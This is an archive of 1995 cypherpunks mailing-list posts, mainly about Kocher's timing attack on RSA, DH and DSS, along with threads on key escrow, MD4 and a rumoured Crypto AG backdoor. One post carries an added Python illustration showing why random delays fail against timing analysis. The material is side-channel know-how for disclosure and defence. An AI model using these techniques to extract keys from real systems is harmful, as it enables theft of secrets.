 EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
   Hate, hate your enemies  save, save your friends  find, find your place
 I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 10 Dec 95 17:48:45 PST
To: daw@quito.CS.Berkeley.EDU (David A Wagner)
Subject: MD4
In-Reply-To: <199512102320.SAA08162@bb.hks.net>
Message-ID: <95Dec10.204825edt.1935@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu> wrote:
> > My understanding was that MD4 had been broken once, at the cost of 
> > much computer time.
> 
> Not *that* much computer time...
I stand corrected.  I've not read the original paper.

> As far as I know, the difficulty of inverting MD4 is still an open
> problem -- but why would you want to use a broken algorithm like MD4
> when you can use MD2, MD5, or SHA?
Granted.  A brute force attack on MD4 takes 2^64 times more operations
to invert it than it does to find matching pairs if I remember correctly.
However a clever algorithm would reduce that.

Of course with MD5 as a plug-in replacement that's only 30% slower
this isn't a big problem.  Looks like the safety belts are worth while
after all.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Sun, 10 Dec 95 21:22:41 PST
To: John Lull <lull@acm.org>
Subject: Re: Paul Kocher's timing attack
In-Reply-To: <199512110312.WAA14627@nsa.tempo.att.com>
Message-ID: <30CBBF9E.6173@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


John Lull wrote:
> ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps
> ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz

The ftp server does not seem to be working. You are better off starting at
	http://ftp.cryptography.com
or going directly to
	http://ftp.cryptography.com//timingattack.html

PK
-- 
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://www.netscape.com/people/karlton
Netscape Communications

     They that can give up essential liberty to obtain a little
     temporary safety deserve neither liberty nor safety.
		- Benjamin Franklin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 10 Dec 95 21:43:05 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: Paul Kocher's timing attack
In-Reply-To: <199512110312.WAA14627@nsa.tempo.att.com>
Message-ID: <30CBC3A3.6506@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


You can find info about Paul's attack at:

        http://www.cryptography.com

        --Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pck@netcom.com (Paul C. Kocher)
Date: Sun, 10 Dec 95 21:50:16 PST
To: cypherpunks@toad.com
Subject: Announce: Timing cryptanalysis of RSA, DH, DSS
Message-ID: <199512110548.VAA08989@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




I've just released details of an attack many of you will find 
interesting since quite a few existing cryptography products and 
systems are potentially at risk.  The general idea of the attack is
that secret keys can be found by measuring the amount of time used to
process messages.  The paper describes attacks against RSA, fixed-
exponent Diffie-Hellman, and DSS, and the techniques can work with 
many other systems as well. 

My research on the subject is still in progress and the current paper 
does not include many of my findings.  I will eventually publish a full 
paper, but am releasing a preliminary draft now to alert the community 
as quickly as possible.  A copy of the abstract is attached at the end 
of this message and the full text can be downloaded in PostScript 
format from:

  ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps
  ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz

I've also made an HTML version which is accessible at:

  http://www.cryptography.com

(The HTML uses subscripts and superscripts which aren't supported 
in older web browsers.  The PostScript version is the "official" 
one and looks nicer.)

The results have already been seen by Matt Blaze, Martin Hellman, Ron 
Rivest, Bruce Schneier, and many others.  While the full significance
of the attack is not yet known, I think everyone who has seen it 
considers it important (including Netscape who awarded me a $1000 
bugs bounty prize). 


    ABSTRACT.  Cryptosystems often take slightly different 
    amounts of time to process different messages. With network-
    based cryptosystems, cryptographic tokens, and many other 
    applications, attackers can measure the amount of time used 
    to complete cryptographic operations.  This abstract shows 
    that timing channels can, and often do, leak key material.  
    The attacks are particularly alarming because they often 
    require only known ciphertext, work even if timing 
    measurements are somewhat inaccurate, are computationally 
    easy, and are difficult to detect.  This preliminary draft 
    outlines attacks that can find secret exponents in Diffie-
    Hellman key exchange, factor RSA keys, and find DSS secret 
    parameters.  Other symmetric and asymmetric cryptographic 
    functions are also at risk. A complete description of the 
    attack will be presented in a full paper, to be released 
    later. I conclude by noting that closing timing channels 
    is often more difficult than might be expected. 


Cheers,
Paul Kocher

*********************************************************************
VERY IMPORTANT: If you send me e-mail, please understand that I
probably won't have time to respond to all who write.  Please keep
messages SHORT and send them to pck@cryptography.com (**not** my
netcom address -- misdirected messages will be ignored).  PGP when
used for e-mail is not vulnerable to the attack.  Please state in
your note whether you would like a reply.
******************************************************************** 

__________________________________________________________________________
Paul C. Kocher           Independent cryptography/data security consultant
E-mail: pck@cryptography.com (please see above before replying)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sun, 10 Dec 95 13:54:44 PST
To: cypherpunks@toad.com
Subject: Re: Escrow expectations
In-Reply-To: <Pine.BSF.3.91.951210013752.18670D-100000@mercury.thepoint.net>
Message-ID: <30cb569a.6612409@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995 19:25:23 +0000 (GMT), I wrote:

> him to register, when it is illegal for him to possess, is a violation
> of his first amendment rights.
         ^^^^^

I meant FIFTH, not first.  Sorry. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sun, 10 Dec 95 19:14:36 PST
To: cypherpunks@toad.com
Subject: Paul Kocher's timing attack
Message-ID: <199512110312.WAA14627@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul Kocher's brutally clever timing attack against on-line
implementations of RSA, DSA and fixed-exponent Diffie-Hellman
is reported on page A1 of Monday's New York Times ("Secure Digital
Transactions Just Got a Little Less Secure" by John Markoff).

The attack requires only a few thousand ciphertext samples and works
against most implementations of public-key cryptosystems in which
the attacker can measure accurately the target's computation time for
each sample.

I think Kocher's paper is online somewhere; I'll post the URL
when I find it.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Siberia" <klong@phoenix.net>
Date: Sun, 10 Dec 95 20:26:02 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <199512110425.WAA13887@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


ftp://ftp.aimnet.com/users/jnavas/winpmail/

On 10 Dec 95 at 4:07, Adam Hupp wrote:

> Where can you get the Open Encryptor PGP interface?

Namaste'

Kimberly Long
klong@phoenix.net

What is life?  It is the flash of a firefly in the night.  It is the breath of a 
buffalo in the wintertime.  It is the little shadow which runs across the 
grass and loses itself in the sunset.
                                              ~Crowfoot 1821-1890         )O( 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Dec 95 22:36:02 PST
To: cypherpunks@toad.com
Subject: *fnord* "Encryption Flaw Rattles Security Industry *fnord*
Message-ID: <199512110634.WAA02677@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Encryption Flaw Rattles Computer Security Industry"

SAN FRANCISCO - The discovery of a vulnerability has shaken
the computer world's faith in the safe use of the data-security
technologies on which most current and planned electronic
banking, shopping and "digital cash" systems are based.

The vulnerability has been found in a class of technologies
known as public-key encryption - designed to provide electronic
transactions by scrambling data so they can be read only by
people with the proper mathematical keys to the code.

The flaw was identified by Paul C. Kocher, a 22-year-old
researcher, who demonstrated a way that an electronic
eavesdropper who is able to monitor the repeated process
of unscrambling the incoming messages could figure out the
private key.  It can be done by repeatedly keeping track
of the precise length of time it takes to unscramble each
message.

--From TimesFax, Mon. Dec. 11 Internet Edition






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Dec 95 22:35:59 PST
To: cypherpunks@toad.com
Subject: *fnord* "Encryption Flaw Rattles Security Industry *fnord*
Message-ID: <199512110634.WAA02690@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Encryption Flaw Rattles Computer Security Industry"

SAN FRANCISCO - The discovery of a vulnerability has shaken
the computer world's faith in the safe use of the data-security
technologies on which most current and planned electronic
banking, shopping and "digital cash" systems are based.

The vulnerability has been found in a class of technologies
known as public-key encryption - designed to provide electronic
transactions by scrambling data so they can be read only by
people with the proper mathematical keys to the code.

The flaw was identified by Paul C. Kocher, a 22-year-old
researcher, who demonstrated a way that an electronic
eavesdropper who is able to monitor the repeated process
of unscrambling the incoming messages could figure out the
private key.  It can be done by repeatedly keeping track
of the precise length of time it takes to unscramble each
message.

--From TimesFax, Mon. Dec. 11 Internet Edition






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Dec 95 22:40:19 PST
To: cypherpunks@toad.com
Subject: *fnord* Addition info *fnord*
Message-ID: <199512110638.WAA02958@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



From: pck@netcom.com (Paul C. Kocher)
Subject: Announce: Timing cryptanalysis of RSA, DH, DSS
Message-ID: <pckDJEEzH.DJ3@netcom.com>
Organization: NETCOM On-line Communication Services (408 261-4700 guest)
Date: Mon, 11 Dec 1995 01:33:17 GMT
Lines: 67
Sender: pck@netcom20.netcom.com

I've just released details of an attack many of you will find 
interesting since quite a few existing cryptography products and 
systems are potentially at risk.  The general idea of the attack is
that secret keys can be found by measuring the amount of time used to
process messages.  The paper describes attacks against RSA, fixed-
exponent Diffie-Hellman, and DSS, and the techniques can work with 
many other systems as well. 

My research on the subject is still in progress and the current paper 
does not include many of my findings.  I will eventually publish a full 
paper, but am releasing a preliminary draft now to alert the community 
as quickly as possible.  A copy of the abstract is attached at the end 
of this message and the full text can be downloaded in PostScript 
format from:

  ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps
  ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz

I've also made an HTML version which is accessible at:

  http://www.cryptography.com

(The HTML uses subscripts and superscripts which aren't supported 
in older web browsers.  The PostScript version is the "official" 
one and looks nicer.)

The results have already been seen by Matt Blaze, Martin Hellman, Ron 
Rivest, Bruce Schneier, and many others.  While the full significance
of the attack is not yet known, I think everyone who has seen it 
considers it important (including Netscape who awarded me a $1000 
bugs bounty prize). 


    ABSTRACT.  Cryptosystems often take slightly different 
    amounts of time to process different messages. With network-
    based cryptosystems, cryptographic tokens, and many other 
    applications, attackers can measure the amount of time used 
    to complete cryptographic operations.  This abstract shows 
    that timing channels can, and often do, leak key material.  
    The attacks are particularly alarming because they often 
    require only known ciphertext, work even if timing 
    measurements are somewhat inaccurate, are computationally 
    easy, and are difficult to detect.  This preliminary draft 
    outlines attacks that can find secret exponents in Diffie-
    Hellman key exchange, factor RSA keys, and find DSS secret 
    parameters.  Other symmetric and asymmetric cryptographic 
    functions are also at risk. A complete description of the 
    attack will be presented in a full paper, to be released 
    later. I conclude by noting that closing timing channels 
    is often more difficult than might be expected. 


Cheers,
Paul Kocher

*********************************************************************
VERY IMPORTANT: If you send me e-mail, please understand that I
probably won't have time to respond to all who write.  Please keep
messages SHORT and send them to pck@cryptography.com (**not** my
netcom address -- misdirected messages will be ignored).  PGP when
used for e-mail is not vulnerable to the attack.  Please state in
your note whether you would like a reply.
******************************************************************** 

__________________________________________________________________________
Paul C. Kocher           Independent cryptography/data security consultant
E-mail: pck@cryptography.com (please see above before replying)

========
Xref: news2.new-york.net sci.crypt:5320
Path: news2.new-york.net!spcuna!uunet!in1.uu.net!newsfeed.internetmci.com!howland.reston.ans.net!ix.netcom.com!netnews
From: jmrubin@ix.netcom.com (Joel M. Rubin)
Newsgroups: sci.crypt
Subject: Re: Announce: Timing cryptanalysis of RSA, DH, DSS
Date: 11 Dec 1995 04:35:47 GMT
Organization: Union of anti-organizationalists
Lines: 11
Message-ID: <4agcf3$enr@ixnews2.ix.netcom.com>
References: <pckDJEEzH.DJ3@netcom.com>
NNTP-Posting-Host: ix-sf17-18.ix.netcom.com
X-NETCOM-Date: Sun Dec 10  8:35:47 PM PST 1995
X-Newsreader: WinVN 0.99.7

I just saw a small article with your name on page 1 of the N.Y. Times 
Fax 8-page Internet Edition. (Monday, December 11, 1995)

They change the edition at about 10:30-11 P.M. Eastern Standard Time 
(0330-0400 the next GMT day) so if you read this before then, you might 
want to download http://nytimesfax.com/times.pdf.

It is in Adobe Acrobat format.

Of course, there is probably a larger article in the paper edition.


========
From: jmrubin@ix.netcom.com (Joel M. Rubin)
Newsgroups: sci.crypt
Subject: Re: Announce: Timing cryptanalysis of RSA, DH, DSS
Date: 11 Dec 1995 04:38:58 GMT
Organization: Union of anti-organizationalists
Lines: 7
Message-ID: <4agcl2$enr@ixnews2.ix.netcom.com>
References: <pckDJEEzH.DJ3@netcom.com>
NNTP-Posting-Host: ix-sf17-18.ix.netcom.com
X-NETCOM-Date: Sun Dec 10  8:38:58 PM PST 1995
X-Newsreader: WinVN 0.99.7

In case you don't already know, there is an article about your work in 
Monday's N.Y. Times. I just read a very small version of it in 
http://nytimesfax.com/times.pdf. (Adobe Acrobat-format 8-page edition)

The N.Y. Times Fax on the web changes edition about 10:30 or 11 P.M. New 
York time so if you want it, get it before then.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Dec 95 22:57:51 PST
To: cypherpunks@toad.com
Subject: Time-based cryptanalysis: How to defeat it?
Message-ID: <199512110656.WAA03942@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



Assuming Alice is decrypting a secret message sent to her
by Bob (on her very slow C64 ;), and Mallet is watching
with a stopwatch in hand, hoping to determine Alice's secret
key...

Would it be good to place inside the decryption routines
a timer (WELL PLACED!) that waits a random number of cycles
(based on key-strokes, mouse position, etc.) to defeat this
type of cryptanalysis?
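
The question above, worked as an added example (not part of the original post and not code from Kocher's paper): a toy model that treats the number of modular multiplications as "time" and shows why a random delay only adds noise, in line with the abstract's remark that the attacks "work even if timing measurements are somewhat inaccurate". The modulus, the two keys, the delay range and all function names are constructed for the illustration, and the Montgomery ladder is swapped in here as one fixed-operation alternative.

```python
import random

MOD = (1 << 61) - 1      # constructed toy modulus (a Mersenne prime)
BITS = 32                # fixed exponent width used by both routines
LIGHT_KEY = 0x80000001   # constructed exponent, Hamming weight 2
HEAVY_KEY = 0xFFFFFFFF   # constructed exponent, Hamming weight 32


def modexp_square_multiply(base, exp, mod, bits=BITS):
    """Left-to-right square-and-multiply. Returns (result, multiplications)."""
    result, ops = 1, 0
    for i in reversed(range(bits)):
        result = (result * result) % mod
        ops += 1
        if (exp >> i) & 1:               # extra multiply only for 1 bits
            result = (result * base) % mod
            ops += 1
    return result, ops


def modexp_ladder(base, exp, mod, bits=BITS):
    """Montgomery ladder: one multiply and one square for every bit.

    Only the operation count is modelled. Python integers and the branch
    below are not constant-time; a real implementation would replace the
    branch with a constant-time conditional swap.
    """
    r0, r1, ops = 1, base % mod, 0
    for i in reversed(range(bits)):
        if (exp >> i) & 1:
            r0, r1 = (r0 * r1) % mod, (r1 * r1) % mod
        else:
            r0, r1 = (r0 * r0) % mod, (r0 * r1) % mod
        ops += 2
    return r0, ops


def mean_time(modexp, exp, samples, max_delay, seed):
    """Average observed cost: multiplication count plus a random delay."""
    rng = random.Random(seed)
    _, ops = modexp(3, exp, MOD)         # the count is fixed for a given key
    total = sum(ops + rng.randint(0, max_delay) for _ in range(samples))
    return total / samples


def timing_gap(modexp, samples=5000, max_delay=200):
    """Mean observed time for HEAVY_KEY minus mean observed time for LIGHT_KEY.

    Independent seeds give each key its own stream of random delays, so the
    delays do not cancel by construction.
    """
    heavy = mean_time(modexp, HEAVY_KEY, samples, max_delay, seed=1)
    light = mean_time(modexp, LIGHT_KEY, samples, max_delay, seed=2)
    return heavy - light


if __name__ == "__main__":
    # The delay (up to 200 units) dwarfs the 30-multiplication difference in
    # any single run, yet the averaged gap stays close to 30 for the leaky
    # routine and close to 0 for the ladder.
    print("square-and-multiply gap:", timing_gap(modexp_square_multiply))
    print("ladder gap:             ", timing_gap(modexp_ladder))
```

The delay has the same distribution whatever the key, so it averages out and the key-dependent difference remains; removing the dependence between key bits and work done is what closes the channel in this model.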







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Dec 95 23:50:09 PST
To: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Subject: Re: GAK and self-incrimination?
Message-ID: <199512110749.XAA11099@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:57 AM 12/10/95 -0800, you wrote:
>The Fifth protects you against *compelled* self-incrimination - in
>particular, the right to be free from the "cruel trilemma" of
>
>        o       conviction of a substantive crime, based on your
>                (true) testimony
>        o       conviction of perjury, for lying when asked to incriminate
>                yourself
>        o       contempt of court sanctions, for refusing to answer

Testimony was often compelled by more direct means than threatened
contempt citations.  Piling rocks on people until they talked was
still in use in the 1600s, unless I've got my dates wrong.
It may have gone out of fashion slightly after witch-burning,
but was still in recent cultural memory of the Constitution's authors.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Dec 95 23:49:59 PST
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: More FUD from First Virtual
Message-ID: <199512110750.XAA11161@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:51 AM 12/10/95 -0500, Nathaniel Borenstein <nsb@fv.com> (Tense Hot
Alien In Barn) wrote:

>In any event, I could write a virus that sits in
>front of the e-cash program and steals your keys when next you run the
>e-cash program.  Software's just too easy to fool.  That's why I regard
>the risk of catastrophe as being fairly large in software-based e-cash
>schemes.

How is this different for an ecash program vs. a First Virtual email
acknowledgement program, where either a (really hairy) virus, or, 
more practically, an active email interloper could fake FV acks?  

While hardware may be the best encryption solution for the average user
(as you say, and I think I agree with you), it needs to have some password
interface such as a small keypad on the front of the smartcard, to prevent
its usability after theft.

Of course, there are problems with digicash as well; my Digicash play-money
account thinks it's empty (in spite of having half a dozen coin-looking files),
and doesn't recognize any of the half-dozen passwords I've guessed I might have
used with it, so I'm not able to use Sameer's digicash-powered remailer.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Dec 95 17:30:13 PST
To: cypherpunks@toad.com
Subject: GAK Query
Message-ID: <199512110128.CAA13387@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Steven Miller, in his "Civilizing Cyberspace," remarks in
his coverage of encryption issues that:

   ... the Administration is trying to split the [GAK]
   opposition by working with private industry groups on
   compromise escrow strategies that would let government
   agents see the contents of decoded messages without
   getting access to the escrowed key itself. [p. 306]

Does anyone know more about this tactic, whether it is
being pursued, or the legal and technical procedures for
decoding and seeing the messages?


As previously noted here:

Civilizing Cyberspace:
Policy, Power and the Information Highway
Steven E. Miller (CPSR Board)
Addison Wesley, 1996
ISBN 0-201-84760-4












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf_Moeller@public.uni-hamburg.de (Ulf Moeller)
Date: Sun, 10 Dec 95 18:31:41 PST
To: cypherpunks@toad.com
Subject: Re: NSA rigs Crypto machines according to Balto Sun
Message-ID: <m0tOxme-00009qC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


pcw@access.digex.net (Peter Wayner) writes:

>So, is this what happened at Crypto AG? Is this what happened at
Netscape?

What happened to Crypto AG is that they are -- at least partly --
*owned* by the German secret service BND.

I'll try to give a rough translation of a section from a book by
Erich Schmidt-Eenboom:

"The BND would like to put a Clipper chip of their own, an exclusive
federal German back-door, into the encryption devices delivered
abroad. Rumors are persistent that this already happens -- illegally,
of course. For that purpose, camouflage companies such as the Crypto AG
in the Swiss Steinhausen am Zuger are preferably used. A former
Crypto financial manager confirmed to FOCUS magazine: The company's
owner is the Federal Republic of Germany. Crypto AG has been delivering
crypto devices to armies, police forces and secret services in about 120
countries for over 40 years.

The enterprise got into the headlines when Crypto employee Hans
Buehler was arrested in March 1992 in Iran for threadbare espionage
accusations and was released only 9 1/2 months later on bail of
one million dollars. The true reasons for the arrest can only be
guessed. According to the records of the Bern police, Buehler was
classified as a security risk after his release by the west German
ministry of defense and then was fired by Crypto AG. The Zuerich
lawyer office assigned with indemnification claims, Gloor & Sieger,
draws the conclusion that "Iran has been suspecting for some longer
time that the crypto devices delivered by Crypto AG had never or
no more conformed with Iranian security needs". Further they state:
"It is a fact (...) that for several years, articles kept appearing
in the international press reporting decryption of classified
messages encrypted with Crypto devices".

Some signs indicate that the suspicion that Crypto devices have
been manipulated on purpose is not at all out of place. During his
arrest in Iran, Buehler has been interrogated about reports in news
articles of the above kind for months. Crypto devices have been
tested and certified by the BND central office for encryption affairs
and later by the BSI. In addition to that: After the murder of exile
politician Bachtiar by an Iranian death commando in Paris, the BND
decrypted an encrypted radio message by the Iranian secret service
VEVAK at no effort."


Original post (translated from German):

From: frank@artcom.de (Frank Rieger)
Newsgroups: de.org.ccc
Subject: Crypto AG (Behrdenverschlsselung)
Date: Wed, 28 Jun 1995 15:13:31 +0200
Organization: ART + COM
Lines: 26
Distribution: world
Message-ID: <frank-2806951513310001@penny.artcom.de>


The list of companies offering encryption devices for government
agencies also included Crypto AG in Switzerland. I just found an
interesting passage about this company in (1):

"The BND would like to build its own Clipper chip, the exclusive
federal German back door, into encryption devices that are delivered
abroad. The rumor persists that this sometimes already happens -
illegally, of course. For this, front companies such as Crypto AG in
the Swiss town of Steinhausen am Zuger are preferably used. A company
of which a former Crypto financial manager confirmed to FOCUS
magazine: the owner of the company is the Federal Republic. For over
40 years Crypto AG has been equipping armies, police forces and secret
services in around 120 countries with encryption devices.

The company made headlines when Crypto employee Hans Buehler was
arrested in Iran in March 1992 on a flimsy espionage charge and was
released only nine and a half months later on payment of bail of one
million dollars. The true reason for the arrest can only be guessed
at. According to files of the Bern police, after his release Buehler
was classified as a security risk by the West German defense ministry
and thereupon dismissed by Crypto AG. The Zurich law firm Gloor &
Sieger, entrusted with the compensation claims, concludes in a brief
"that Iran had for some time suspected that the cipher devices
supplied by Crypto AG did not, or no longer, meet Iranian security
needs". It continues: "It is a fact (...) that over several years
articles repeatedly appeared in the international press reporting on
the alleged decryption of classified messages that had been
enciphered with Crypto devices."

Some indications suggest that the suspicion that Crypto devices were
deliberately manipulated is by no means far-fetched. During his
detention in Iran, Buehler was interrogated for months about reports
in newspaper articles of the kind mentioned. Crypto devices were
tested and approved by the BND's Zentralstelle fuer Chiffrierwesen
(central office for cipher affairs) and later by the BSI. In
addition: after the murder of the exiled politician Bachtiar by an
Iranian death squad in Paris, the BND found it easy to decipher an
encrypted radio message of the Iranian secret service VEVAK."

(1): Schmidt-Eenboom, Erich: Die schmutzigen Geschäfte der Wirtschaftsspione; ECON Verlag 1994, pp. 230f.
(OCR and conversion errors possible)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sun, 10 Dec 95 20:46:26 PST
To: cypherpunks@toad.com
Subject: Re: Paul Kocher's timing attack
In-Reply-To: <199512110312.WAA14627@nsa.tempo.att.com>
Message-ID: <30cbb71c.21744721@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze wrote:

> I think Kocher's paper is online somewhere; I'll post the URL
> when I find it.

ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps
ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 10 Dec 95 22:18:25 PST
To: Jerry Whiting <cypherpunks@toad.com>
Subject: Re: More elveator problem
Message-ID: <199512110720.BAA04212@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995 00:23:41 -0800, Jerry Whiting wrote:

>More on The Elevator Problem:

>I'll confess that we're working on a new private key encryption product. Free 
>and clear of existing claims on intellectual property, I'd like a protocol 
>that answers the elevator problem: how can Alice and Bob agree on a private 
>key via a compromised channel? I don't want them to meet under a street lamp 
>and whisper in each other's ears _before_ trying to establish a secret on a 
>crowded elevator.

[..]
>Something that I neglected to mention before is that Alice and Bob do have a 
>unique ID within this system, not that they necessarily know each others. If 
>one assumes that they do, they then share a secret: the knowledge of each 
>other's unique ID.
[..]

Wait... are unique IDs secret from others? Can they share theirs with
ea. other without compromising something?

Maybe using a hash of their combined secret ideas (adding them, or
mixing the bits... how long is the unique ID?) can be used to generate
a "key" to exchange other information....


>Jerry Whiting
>jwhiting@azalea.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Den-Hollander <denholl@ceram.fr>
Date: Mon, 11 Dec 95 02:15:55 PST
To: cypherpunks@toad.com
Subject: OGY, chaotic scrambling
Message-ID: <199512111014.LAA13942@mbds.ceram.fr>
MIME-Version: 1.0
Content-Type: text/plain


A few years back I ran through a paper emanating
from a navy labs researcher (I think the name was Peccora)
about using synchronised chaotic signal generators as a
signal scrambling/encryption scheme.

Has there been any kind of progress in this line of work,
practical applications?

Answer on C4i-pro or directly email to Denholl@ceram.fr

L. Den-Hollander. OIT engineer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Mon, 11 Dec 95 20:15:55 PST
To: cypherpunks@toad.com
Subject: Anohter angle on timing (TEMPEST)
Message-ID: <9512120332.AA05424@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


	Reading of Mr Kocher's clever attack brings to mind another way
of obtaining the timings it uses, particularly on smartcards and other 
tamper resistant hardware based crypto devices - but also perhaps on
locally accessible (and poorly shielded) servers.

	Observing small changes in current drain, radiated rf pulses,
ground noise, noise on other pins of the device (eg a smartcard)  and
other kinds of transient electrical noise generated by an internal
processor performing a crypto algorithm might very well allow one
to quite precisely identify when certain sections  or loops in the
internal code of the device were running.   Using this information with
Kocher's statistical approach to determining bit values from time
variances might make such a tempest attack on protected keys held by
such devices practical even for those of us not privy to the tricks
used by the spooks to process tempest data.  And it certainly could make
available much more timing information per run than just the gross time
to complete the crypto operation, in fact it is entirely possible that
an accurate timing for each step of the algorithm could be derived from
such noise measurements.
  
						Dave Emery
						die@die.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@netcom.com (Ed Carp)
Date: Tue, 12 Dec 95 04:05:53 PST
To: cypherpunks@toad.com
Subject: Roger's case against RSA?
Message-ID: <199512121203.EAA01268@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I know that a week or so ago, there was a hearing in San Jose regarding
Roger Schafly's (sp.) case against RSA.  How did the hearing come out?  I
never saw a post... :(
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Tue, 12 Dec 95 05:30:10 PST
To: turner@TeleCheck.com
Subject: Re: In pursuit of the perfect frisbie (was NSA flying disk...)
Message-ID: <199512121139.FAA22570@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> To:            cman@communities.com (Douglas Barnes)
> Cc:            cypherpunks@toad.com, turner@TeleCheck.com
> Subject:       In pursuit of the perfect frisbie (was NSA flying disk...)
> Date:          Mon, 11 Dec 95 14:33:26 -0600
> From:          turner@TeleCheck.com

> I spoke with Mr. Cisco for several minutes, but he stated that the
> NSA would not be at any trade shows in the Southern United States
> any time soon.  He did state that they would be in Salt Lake, sometime
> in the near future.

Did he mention a specific date and place?  I still have friends in 
SLC... :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 12 Dec 95 01:45:37 PST
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512112125.QAA07753@homeport.org>
Message-ID: <Pine.SUN.3.91.951212044438.11096A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995, Adam Shostack wrote:

> Jeff Weinstein wrote:
> 
> | PS - I think Paul was a bit surprised when Jim Barksdale pulled
